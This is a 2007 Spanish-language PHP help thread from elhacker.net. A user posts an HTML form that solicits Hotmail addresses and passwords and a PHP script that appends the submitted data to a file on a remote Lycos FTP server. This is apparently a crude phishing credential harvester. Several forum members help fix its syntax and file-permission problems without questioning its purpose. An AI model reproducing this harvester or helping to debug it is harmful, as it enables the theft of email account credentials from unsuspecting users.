elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Duda codigo PHP
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Duda codigo PHP  (Leído 5,397 veces)
knox18

Desconectado Desconectado

Mensajes: 19



Ver Perfil
Duda codigo PHP
« en: 9 Septiembre 2007, 15:30 pm »

aver stoi intentando krear komo una especie de base de datos.. xo en verdad es un pokito extraña.. estoi intentando volcar el contenido de un formulario en un archivo de texto plano.. aki indico el codigo
archivo principal
Código:
<html>
<body>

<FORM METHOD="post" ACTION="txt.php">

<p>Su cuenta de Correo <input type="text" name="Email" size="20" value="@hotmail.com">
<p>Su contraseña <input type="text" name="pass" size="20" value="******">

<input type="submit" value="enviar" name="enviar">

</body>
</html>

archivo txt.php
Código:
<?PHP; 

if (isset($_post['enviar'])
{

    if (@$fp = fopen("ftp://*****:******@ftp.usuarios.lycos.es/emails.txt","a"))
    {
        fwrite($fp,$_post['Email']."\r\n");
        fclose($fp);
    }
}

?>

El problema es k me da un error en la linea 4 del txt.php.. e intentado por varios metodos xo no le encuentro solucion, x favor una ayuda me sentaria muy bien un saludo


En línea

Duerme con el pensamiento de la muerte y levántate con el pensamiento de que la vida es corta.
alone-in-the-chat


Desconectado Desconectado

Mensajes: 587


Ver Perfil
Re: Duda codigo PHP
« Respuesta #1 en: 9 Septiembre 2007, 16:05 pm »

Hola

Cual es el error que te lanza? Postealo por favor


Saludos.


En línea

Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b
knox18

Desconectado Desconectado

Mensajes: 19



Ver Perfil
Re: Duda codigo PHP
« Respuesta #2 en: 9 Septiembre 2007, 16:10 pm »

ok! perdon por el detalle
Código:
Parse error: syntax error, unexpected '{' in /data/members/free/tripod/es/t/r/e/trepones/htdocs/txt.php on line 4
En línea

Duerme con el pensamiento de la muerte y levántate con el pensamiento de que la vida es corta.
alone-in-the-chat


Desconectado Desconectado

Mensajes: 587


Ver Perfil
Re: Duda codigo PHP
« Respuesta #3 en: 9 Septiembre 2007, 16:13 pm »


Prueba asi

Código
  1. <?PHP;
  2.  
  3. if (isset($_POST['enviar']))
  4. {
  5.    @$fp = fopen("ftp://*****:******@ftp.usuarios.lycos.es/emails.txt","a");
  6.    if ($fp)
  7.    {
  8.        fwrite($fp,$_POST['Email']."\n");
  9.        fclose($fp);
  10.    }
  11. }
  12.  
  13. ?>
  14.  


Saludos
En línea

Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b
knox18

Desconectado Desconectado

Mensajes: 19



Ver Perfil
Re: Duda codigo PHP
« Respuesta #4 en: 9 Septiembre 2007, 17:45 pm »

to perfe aora no me da el erro solamente tengo un problema y es k sige sin escribirme en el archivo de texto plano :S gracias alone
En línea

Duerme con el pensamiento de la muerte y levántate con el pensamiento de que la vida es corta.
SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: Duda codigo PHP
« Respuesta #5 en: 9 Septiembre 2007, 18:42 pm »

Eso es porque quizas no tienes permisos de escritura. O si?
De ser asi tienes q hacerlo con el comando chmod.
En línea

Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
Alex_bro


Desconectado Desconectado

Mensajes: 1.246



Ver Perfil
Re: Duda codigo PHP
« Respuesta #6 en: 9 Septiembre 2007, 19:48 pm »

Seguramente sean los permisos como dice SeniorX.
Recuerda filtrar los datos si despues piensas mostrarlos en la web.
Y por si te interesa, te recomendaria pjjTextBase si haces algo mas complicado que guardar correos en un txt.

Saludos.
En línea

knox18

Desconectado Desconectado

Mensajes: 19



Ver Perfil
Re: Duda codigo PHP
« Respuesta #7 en: 9 Septiembre 2007, 21:16 pm »

señores no se xk xo me lo lee to perfecto no me da ningun error xo sin embargo sigue sin escribirme en el arxivo de texto plano...  :-\

paso los codigos de nuevo tal y como stan
archivo principal.html
Código:
<html>
<body>

<FORM METHOD="post" ACTION="txt.php">

<p>Su cuenta de Correo <input type="text" name="Email" size="20" value="@hotmail.com">
<p>Su contraseña <input type="text" name="pass" size="20" value="******">

<input type="submit" value="enviar" name="enviar">

</body>

arxivo txt.php
Código:
<?PHP;  if (isset($_post['enviar'])){
     $fp = fopen("ftp://*****:******@ftp.usuarios.lycos.es/emails.txt", "w");
    if ($fp)
     {
         fwrite($fp,$_post['Email']."\n");
         fwrite($fp,$_post['name']."\n");
         fclose($fp);
     } } 

?>


wahhh stoi askeaoooo, xcierto ya le puesto atributos de skritura lectura a todos y sige sin funcionar... :S
En línea

Duerme con el pensamiento de la muerte y levántate con el pensamiento de que la vida es corta.
Alex_bro


Desconectado Desconectado

Mensajes: 1.246



Ver Perfil
Re: Duda codigo PHP
« Respuesta #8 en: 9 Septiembre 2007, 23:27 pm »

pero tienes que darle atributos de escritura tambien, mira que tenga 777.

Saludos.
En línea

knox18

Desconectado Desconectado

Mensajes: 19



Ver Perfil
Re: Duda codigo PHP
« Respuesta #9 en: 10 Septiembre 2007, 01:33 am »

ya tiene atributos de lectura y escritura para propietario, grupo y otros... 666 a un arxivo de texto plano no le puedo dar de ejecucion asi k... no tngo ni idea de xk no se puede. Puede ser x el puto servidor de lycos??
En línea

Duerme con el pensamiento de la muerte y levántate con el pensamiento de que la vida es corta.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda código en C
Programación C/C++
apache_888 4 1,961 Último mensaje 14 Noviembre 2012, 12:04 pm
por apache_888
Duda con codigo
Programación C/C++
[Kayser] 1 1,475 Último mensaje 17 Diciembre 2012, 20:27 pm
por naderST
duda con codigo php
PHP
abbyblack123 3 1,673 Último mensaje 20 Mayo 2013, 19:54 pm
por abbyblack123
duda con código if [c++] « 1 2 »
Programación C/C++
andrex.125 12 4,433 Último mensaje 30 Mayo 2013, 09:59 am
por amchacon
DUDA CODIGO C#
.NET (C#, VB.NET, ASP)
burnssss 8 4,678 Último mensaje 30 Octubre 2013, 22:15 pm
por burnssss
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines